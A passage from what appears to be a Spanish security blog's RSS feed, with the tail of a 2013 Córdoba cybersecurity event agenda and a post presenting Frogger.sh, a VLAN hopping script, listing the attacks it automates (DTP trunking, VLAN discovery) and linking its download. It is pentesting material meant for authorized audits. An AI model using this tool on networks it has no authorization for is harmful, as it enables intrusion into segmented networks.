&lt;li&gt;&lt;span style="-webkit-text-size-adjust: none; background-color: white; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px;"&gt;12:15-13:30.&amp;nbsp;&lt;/span&gt;&lt;b style="-webkit-text-size-adjust: none; border: 0px; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; margin: 0px; outline: 0px; padding: 0px; vertical-align: top;"&gt;Simulación de Ciberataque.&lt;/b&gt;&lt;span style="-webkit-text-size-adjust: none; background-color: white; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px;"&gt;&amp;nbsp;SOC Aconsa.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="-webkit-text-size-adjust: none; background-color: white; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px;"&gt;13:30-13:45.&amp;nbsp;&lt;/span&gt;&lt;b style="-webkit-text-size-adjust: none; border: 0px; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; margin: 0px; outline: 0px; padding: 0px; vertical-align: top;"&gt;Apertura de la sesión.&lt;/b&gt;&lt;span style="-webkit-text-size-adjust: none; background-color: white; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px;"&gt;&amp;nbsp;Diputación.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="-webkit-text-size-adjust: none; background-color: white; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px;"&gt;16:30-16:45.&amp;nbsp;&lt;/span&gt;&lt;b style="-webkit-text-size-adjust: none; border: 0px; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; margin: 0px; outline: 0px; padding: 0px; vertical-align: top;"&gt;Los nuevos perfiles laborales en el mundo de la seguridad.&lt;/b&gt;&lt;span style="-webkit-text-size-adjust: none; background-color: white; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px;"&gt;&amp;nbsp;Mesa redonda (Joaquín González, UCO, Policía...).&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="-webkit-text-size-adjust: none; background-color: white; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px;"&gt;16:45-17:30.&amp;nbsp;&lt;/span&gt;&lt;b style="-webkit-text-size-adjust: none; border: 0px; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; margin: 0px; outline: 0px; padding: 0px; vertical-align: top;"&gt;Inteligencia en Ciberseguridad.&lt;/b&gt;&lt;span style="-webkit-text-size-adjust: none; background-color: white; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px;"&gt;&amp;nbsp;Roberto Peña.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="-webkit-text-size-adjust: none; background-color: white; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px;"&gt;17:30-18:15.&amp;nbsp;&lt;/span&gt;&lt;b style="-webkit-text-size-adjust: none; border: 0px; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; margin: 0px; outline: 0px; padding: 0px; vertical-align: top;"&gt;Seguridad de dispositivos y datos.&lt;/b&gt;&lt;span style="-webkit-text-size-adjust: none; background-color: white; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px;"&gt;&amp;nbsp;Checkpoint.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="-webkit-text-size-adjust: none; background-color: white; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px;"&gt;18:15-19:00.&amp;nbsp;&lt;/span&gt;&lt;b style="-webkit-text-size-adjust: none; border: 0px; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; margin: 0px; outline: 0px; padding: 0px; vertical-align: top;"&gt;Seguridad en la nube.&lt;/b&gt;&lt;span style="-webkit-text-size-adjust: none; background-color: white; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px;"&gt;&amp;nbsp;Josep Bardallo (SVT).&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="-webkit-text-size-adjust: none; background-color: white; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px;"&gt;19:00-19:45.&amp;nbsp;&lt;/span&gt;&lt;b style="-webkit-text-size-adjust: none; border: 0px; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; margin: 0px; outline: 0px; padding: 0px; vertical-align: top;"&gt;Cierre de la jornada.&lt;/b&gt;&lt;span style="-webkit-text-size-adjust: none; background-color: white; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px;"&gt;&amp;nbsp;Diputación.&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/blockquote&gt;
&lt;br /&gt;
&lt;span style="background-color: white; font-family: Arial, Verdana, Tahoma, sans-serif; line-height: 17.5px;"&gt;&lt;b&gt;&lt;span style="font-size: large;"&gt;&lt;u&gt;Jornada II&lt;/u&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
Fecha: &lt;b&gt;16/05/2013&lt;/b&gt;&lt;br /&gt;Diputación&lt;br /&gt;Organiza: Diputación/Eprinsa&lt;br /&gt;
&lt;br style="background-color: white;" /&gt;
&lt;blockquote class="tr_bq"&gt;
&lt;ul&gt;
&lt;li&gt;&lt;span style="-webkit-text-size-adjust: none; background-color: white; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px;"&gt;9:30-09:45.&amp;nbsp;&lt;/span&gt;&lt;b style="-webkit-text-size-adjust: none; border: 0px; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; margin: 0px; outline: 0px; padding: 0px; vertical-align: top;"&gt;Presentación Institucional.&lt;/b&gt;&lt;span style="-webkit-text-size-adjust: none; background-color: white; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px;"&gt;&amp;nbsp;Diputación.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;b&gt;&lt;span style="-webkit-text-size-adjust: none; background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px;"&gt;9:45-10:30.&lt;span style="color: red;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span style="-webkit-text-size-adjust: none; border: 0px; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; margin: 0px; outline: 0px; padding: 0px; vertical-align: top;"&gt;Seguridad en la empresa: La amenaza de los smartphones.&lt;/span&gt;&lt;span style="-webkit-text-size-adjust: none; background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px;"&gt;&amp;nbsp;Julián González (ISDEFE).&lt;/span&gt;&lt;/b&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="-webkit-text-size-adjust: none; background-color: white; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px;"&gt;10:30-11:15.&amp;nbsp;&lt;/span&gt;&lt;b style="-webkit-text-size-adjust: none; border: 0px; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; margin: 0px; outline: 0px; padding: 0px; vertical-align: top;"&gt;Virtualización de grandes organizaciones.&lt;/b&gt;&lt;span style="-webkit-text-size-adjust: none; background-color: white; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px;"&gt;&amp;nbsp;Pablo Maza (Cajasur).&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="-webkit-text-size-adjust: none; background-color: white; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px;"&gt;11:45-12:30.&amp;nbsp;&lt;/span&gt;&lt;b style="-webkit-text-size-adjust: none; border: 0px; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; margin: 0px; outline: 0px; padding: 0px; vertical-align: top;"&gt;Taller de...&lt;/b&gt;&lt;span style="-webkit-text-size-adjust: none; background-color: white; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px;"&gt;&amp;nbsp;Alumnos varios (UCO).&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="-webkit-text-size-adjust: none; background-color: white; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px;"&gt;12:30-13:30.&amp;nbsp;&lt;/span&gt;&lt;b style="-webkit-text-size-adjust: none; border: 0px; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; margin: 0px; outline: 0px; padding: 0px; vertical-align: top;"&gt;Taller de seguridad WiFi.&lt;/b&gt;&lt;span style="-webkit-text-size-adjust: none; background-color: white; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px;"&gt;&amp;nbsp;Manuel Camacho (Proxy).&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="-webkit-text-size-adjust: none; background-color: white; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px;"&gt;13:30-13:45.&amp;nbsp;&lt;/span&gt;&lt;b style="-webkit-text-size-adjust: none; border: 0px; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; margin: 0px; outline: 0px; padding: 0px; vertical-align: top;"&gt;Cierre de la jornada.&lt;/b&gt;&lt;span style="-webkit-text-size-adjust: none; background-color: white; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px;"&gt;&amp;nbsp;Diputación.&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/blockquote&gt;
&lt;br /&gt;
&lt;span style="background-color: white; font-family: Arial, Verdana, Tahoma, sans-serif; font-size: 14px; line-height: 17.5px;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style="background-color: orange;"&gt;&lt;span style="color: white;"&gt;&lt;b&gt;Hack &amp;amp; Beers &lt;span style="font-size: large;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Fecha: &lt;b&gt;16/05/2013&lt;/b&gt;&lt;br /&gt;Cosfera&lt;br /&gt;Organiza: Cosfera/Aconsa&lt;br /&gt;&lt;br /&gt;
&lt;blockquote class="tr_bq"&gt;
&lt;ul&gt;
&lt;li&gt;17:00-17:15. Presentación. Cosfera.&lt;/li&gt;
&lt;li&gt;&lt;b&gt;17:15-18:00. Taller de Metasploit: Pivoting. Julián González (ST2Labs).&lt;/b&gt;&lt;/li&gt;
&lt;li&gt;18:00-18:45. Enjaulando NGiNX. Mª José Montes (HDMagazine).&lt;/li&gt;
&lt;li&gt;18:45-19:30. Descubriendo el terreno de juego. Miguel Ángel (Aconsa).&lt;/li&gt;
&lt;li&gt;19:30-20:00. Entrega de premios y resumen reto. Aconsa/Cosfera/Infinito.&lt;/li&gt;
&lt;li&gt;20:00... Networking / beers. Cosfera.&lt;/li&gt;
&lt;/ul&gt;
&lt;/blockquote&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;span style="background-color: white; font-family: Arial, Verdana, Tahoma, sans-serif; line-height: 17.5px;"&gt;&lt;b&gt;&lt;span style="font-size: large;"&gt;¿Donde?&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: white; font-family: Arial, Verdana, Tahoma, sans-serif; font-size: 14px; line-height: 17.5px;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style="background-color: white;"&gt;&lt;span style="font-family: Arial, Verdana, Tahoma, sans-serif;"&gt;&lt;span style="font-size: 14px; line-height: 17.5px;"&gt;En la sala de usos&amp;nbsp;múltiples &amp;nbsp;8 y 9 de Mayo 2013, y en el salón de actos palacio de la Merced, los días 15 y 16 de Mayo 2013,&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="background-color: white; font-family: Arial, Verdana, Tahoma, sans-serif; font-size: 14px; line-height: 17.5px;"&gt;de la Diputación Provincial de Córdoba (Andalucía).&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: white; font-family: Arial, Verdana, Tahoma, sans-serif; font-size: 14px; line-height: 17.5px;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;iframe frameborder="0" height="350" marginheight="0" marginwidth="0" scrolling="no" src="http://maps.google.es/maps?ie=UTF8&amp;amp;q=diputacion+cordoba&amp;amp;fb=1&amp;amp;gl=es&amp;amp;hq=diputacion&amp;amp;hnear=0xd6cdf26f95e0aef:0x4df1d2e8108456c3,C%C3%B3rdoba&amp;amp;cid=0,0,2899545025737351186&amp;amp;t=m&amp;amp;z=16&amp;amp;iwloc=A&amp;amp;output=embed" style="-webkit-text-size-adjust: none; background-color: white; border-width: 0px; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 22px; margin: 0px; outline: 0px; padding: 0px; text-align: center; vertical-align: top;" width="425"&gt;&lt;/iframe&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-n0oZASbcp1c/UXfmgzJf4bI/AAAAAAAAEdg/PsCsZcgtwqw/s1600/SecurimaTICa_Cordoba_cartel.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="200" src="http://1.bp.blogspot.com/-n0oZASbcp1c/UXfmgzJf4bI/AAAAAAAAEdg/PsCsZcgtwqw/s200/SecurimaTICa_Cordoba_cartel.png" width="142" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;b&gt;&lt;span style="font-size: large;"&gt;Referencias:&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-family: Arial, Verdana, Tahoma, sans-serif;"&gt;&lt;span style="font-size: 14px; line-height: 17.5px;"&gt;&lt;a href="http://www.dipucordoba.es/#/contenidos/26793/la_diputacion_impulsa_securimatica_para_contribuir_a_implantar_la_cultura_de_la_ciberseguridad" target="_blank"&gt;Nota de prensa: Diputación Provincial de Córdoba&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;a href="http://www.programacreatica.es/"&gt;http://www.programacreatica.es&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=ibfyigD4Gyw:ZH9vMXohxjA:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=ibfyigD4Gyw:ZH9vMXohxjA:7Q72WNTAKBA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?d=7Q72WNTAKBA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=ibfyigD4Gyw:ZH9vMXohxjA:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?i=ibfyigD4Gyw:ZH9vMXohxjA:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=ibfyigD4Gyw:ZH9vMXohxjA:dnMXMwOfBR0"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?d=dnMXMwOfBR0" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=ibfyigD4Gyw:ZH9vMXohxjA:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?i=ibfyigD4Gyw:ZH9vMXohxjA:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=ibfyigD4Gyw:ZH9vMXohxjA:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=ibfyigD4Gyw:ZH9vMXohxjA:F7zBnMyn0Lo"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?i=ibfyigD4Gyw:ZH9vMXohxjA:F7zBnMyn0Lo" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/SXato2/~4/ibfyigD4Gyw" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/SXato2/~3/ibfyigD4Gyw/securimatica-ciberseguridad-cordoba.html</link><author>noreply@blogger.com (Julián Gonzalez)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/-CCrUE6z8kYU/UXfeb9ew-3I/AAAAAAAAEdQ/XKpcaKr64L4/s72-c/SecurimaTICa_Cordoba_Post_Head.png" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://www.seguridadparatodos.es/2013/04/securimatica-ciberseguridad-cordoba.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8268567775100190466.post-1131934317673205244</guid><pubDate>Thu, 18 Apr 2013 07:00:00 +0000</pubDate><atom:updated>2013-04-18T10:02:11.440+02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Pentesting</category><category domain="http://www.blogger.com/atom/ns#">Script</category><category domain="http://www.blogger.com/atom/ns#">Tools</category><category domain="http://www.blogger.com/atom/ns#">Hopping</category><category domain="http://www.blogger.com/atom/ns#">Frooger</category><category domain="http://www.blogger.com/atom/ns#">VLAN</category><category domain="http://www.blogger.com/atom/ns#">Pentester</category><category domain="http://www.blogger.com/atom/ns#">Yersinia</category><category domain="http://www.blogger.com/atom/ns#">ARP</category><title>#Pentesting [Tools] Frogger.sh // VLAN Hopping Script</title><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-225KsY7S_Dk/UW5nAdN-HpI/AAAAAAAAEdA/GvzCcT4Wyls/s1600/Frogger_Scripts.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://3.bp.blogspot.com/-225KsY7S_Dk/UW5nAdN-HpI/AAAAAAAAEdA/GvzCcT4Wyls/s1600/Frogger_Scripts.png" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-size: large;"&gt;&lt;b&gt;¿Qué es Frogger?&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
Es un script creado por &lt;a href="http://commonexploits.com/"&gt;commonexploits.com&lt;/a&gt; para automatizar el proceso de auditoria de infraestructuras de redes con segmentación mediante VLAN. Este script facilita y automatiza la tarea de descubrimiento&amp;nbsp;de VLAN (enumeration) y la ejecución de diferentes tipo de ataques.&lt;/div&gt;
&lt;blockquote class="tr_bq"&gt;
&lt;i&gt;&lt;b&gt;VLAN&lt;/b&gt; &lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 19.1875px;"&gt;es un método de crear&amp;nbsp;&lt;/span&gt;redes&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 19.1875px;"&gt;&amp;nbsp;lógicamente independientes dentro de una misma red física [&lt;/span&gt;&lt;span style="background-color: white; font-family: sans-serif; line-height: 19.1875px;"&gt;&lt;span style="font-size: xx-small;"&gt;&lt;a href="http://es.wikipedia.org/wiki/VLAN" target="_blank"&gt;Wikipedia&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 19.1875px;"&gt;]&lt;/span&gt;&lt;/i&gt;&lt;/blockquote&gt;
&lt;div style="text-align: justify;"&gt;
Por supuesto, para utilizar este script en una red propiedad de terceros, se debe de contar con la autorización correspondiente, en caso contrario, utilizar este script solamente en vuestra propia infraestructura de red.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;span style="font-size: large;"&gt;&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;span style="font-size: large;"&gt;&lt;b&gt;¿Cómo funciona?&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
El script ha sido creado para automatizar el proceso de descubrimiento de la VLAN y su identificador, así como la preparación para realizar un posterior ataque sobre las VLAN de interes. Este proceso se suele realizar de forma manual, utilizando un sniffer, yersinia, arpscan, etc. Con este script puede ahorrarse tiempo al realizar el proceso de forma automática.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Este script, necesita de las herramientas anteriormente mencionadas para poder funcionar, ya que se limita a automatizar el proceso y utilización de las mismas. Por ello, para comprender y saber utilizar adecuadamente este script es fundamental conocer el funcionamiento de todas las herramientas que intervienen.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
El script automatiza las siguientes tareas:&lt;/div&gt;
&lt;blockquote class="tr_bq"&gt;
&lt;ul&gt;
&lt;li style="text-align: justify;"&gt;Analiza el tráfico de red en busca de paquetes CDP, y extrae la siguiente información (VTP domain name, VLAN management address, Native VLAN ID and IOS version of Cisco devices).&amp;nbsp;&lt;/li&gt;
&lt;/ul&gt;
&lt;/blockquote&gt;
&lt;blockquote class="tr_bq"&gt;
&lt;ul&gt;
&lt;li style="text-align: justify;"&gt;&amp;nbsp;Activación del DTP Trunk attack de forma automática.&amp;nbsp;&lt;/li&gt;
&lt;/ul&gt;
&lt;/blockquote&gt;
&lt;blockquote class="tr_bq"&gt;
&lt;ul&gt;
&lt;li style="text-align: justify;"&gt;&amp;nbsp;Analiza el tráfico de red en busca de paquetes STP para extraer las etiquetas 802.1Q VLAN e identificar sus correspondientes IDs.&amp;nbsp;&lt;/li&gt;
&lt;/ul&gt;
&lt;/blockquote&gt;
&lt;blockquote class="tr_bq"&gt;
&lt;ul&gt;
&lt;li style="text-align: justify;"&gt;&amp;nbsp;Con los IDs VLAN se inicia un descubrimiento de equipos activos en la red con ayuda de arp-scan.&amp;nbsp;&lt;/li&gt;
&lt;/ul&gt;
&lt;/blockquote&gt;
&lt;blockquote class="tr_bq"&gt;
&lt;ul&gt;
&lt;li style="text-align: justify;"&gt;&amp;nbsp;Se creará&amp;nbsp;automáticamente&amp;nbsp;una interfaz de red VLAN para poder conectarse ala VLAN seleccionada.&amp;nbsp;&lt;/li&gt;
&lt;/ul&gt;
&lt;/blockquote&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
Según el autor el script ha sido probado con éxito en una distribución BackTrack, en particular la BT5. Se necesita la versión de arp-scan version 1.8 con soporte tagged VLAN ID [2]. &amp;lt;&amp;lt; &lt;span style="background-color: #444444;"&gt;&lt;span style="color: white;"&gt;Puedo confirmar que efectivamente el script funciona en BT5, siendo necesario descargar e instalar el arp-scan 1.8&lt;/span&gt; &lt;/span&gt;&amp;gt;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;u&gt;Download ARP-SCAN&lt;/u&gt;: &lt;a href="http://www.nta-monitor.com/files/arp-scan/arp-scan-1.8.tar.gz"&gt;http://www.nta-monitor.com/files/arp-scan/arp-scan-1.8.tar.gz&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;blockquote class="tr_bq"&gt;
root@ST2Labs~# ./confgure&lt;br /&gt;root@ST2Labs~# make &amp;amp;&amp;amp; make install&lt;/blockquote&gt;
&lt;br /&gt;
Y todo listo, ya&amp;nbsp;podéis&amp;nbsp;descargar el script frogger.sh y empezar a jugar!&lt;br /&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-SWkwdGXo6O8/TmOkkR-psqI/AAAAAAAABN4/p88iDoTfLWI/s1600/Download_ICOnS.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://4.bp.blogspot.com/-SWkwdGXo6O8/TmOkkR-psqI/AAAAAAAABN4/p88iDoTfLWI/s1600/Download_ICOnS.jpg" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div style="background-color: #e6e6e6; border: 0px; color: #333333; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 20px; outline: 0px; padding: 10px 0px; vertical-align: baseline;"&gt;
&lt;strong style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"&gt;Download Version 1.4:&lt;/strong&gt;&amp;nbsp;&lt;a href="http://www.commonexploits.com/tools/frogger/frogger.sh" style="background-color: transparent; border: 0px; color: #7a0001; margin: 0px; outline: 0px; padding: 0px; text-decoration: none; vertical-align: baseline;" target="_blank" title="Download Frogger"&gt;http://www.commonexploits.com/tools/frogger/frogger.sh&lt;/a&gt;&lt;/div&gt;
&lt;div style="background-color: #e6e6e6; border: 0px; color: #333333; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 20px; outline: 0px; padding: 10px 0px; vertical-align: baseline;"&gt;
(19/12/12) 1.4 uploaded. 4x faster at CDP scanning, thanks to&amp;nbsp;Bernardo Damele for code improvements. Other improvements made to improve the easy of use.&lt;/div&gt;
&lt;div style="background-color: #e6e6e6; border: 0px; color: #333333; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 20px; outline: 0px; padding: 10px 0px; vertical-align: baseline;"&gt;
&lt;em style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"&gt;(18/5/12) 1.2 uploaded, 1.1 was the wrong version I uploaded :/). 1.2 lists VLAN ID’s in a better way.&lt;/em&gt;&lt;/div&gt;
&lt;div style="background-color: #e6e6e6; border: 0px; color: #333333; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 20px; outline: 0px; padding: 10px 0px; vertical-align: baseline;"&gt;
&lt;strong style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"&gt;MD5 Checksum:&lt;/strong&gt;&amp;nbsp;be20d89fe0c7f49b3dacd818d55628be&lt;/div&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style="font-size: large;"&gt;Referencias:&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
[1] &lt;a href="http://www.commonexploits.com/?p=444" target="_blank"&gt;Frogger – VLAN Hopping Script&lt;/a&gt;&lt;br /&gt;
[2] &lt;a href="http://www.nta-monitor.com/tools/arp-scan/" target="_blank"&gt;ARPSCAN with tagged VLAN ID support&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=PM_FQZnQCUo:Nv5ekQlQNHw:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=PM_FQZnQCUo:Nv5ekQlQNHw:7Q72WNTAKBA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?d=7Q72WNTAKBA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=PM_FQZnQCUo:Nv5ekQlQNHw:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?i=PM_FQZnQCUo:Nv5ekQlQNHw:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=PM_FQZnQCUo:Nv5ekQlQNHw:dnMXMwOfBR0"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?d=dnMXMwOfBR0" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a 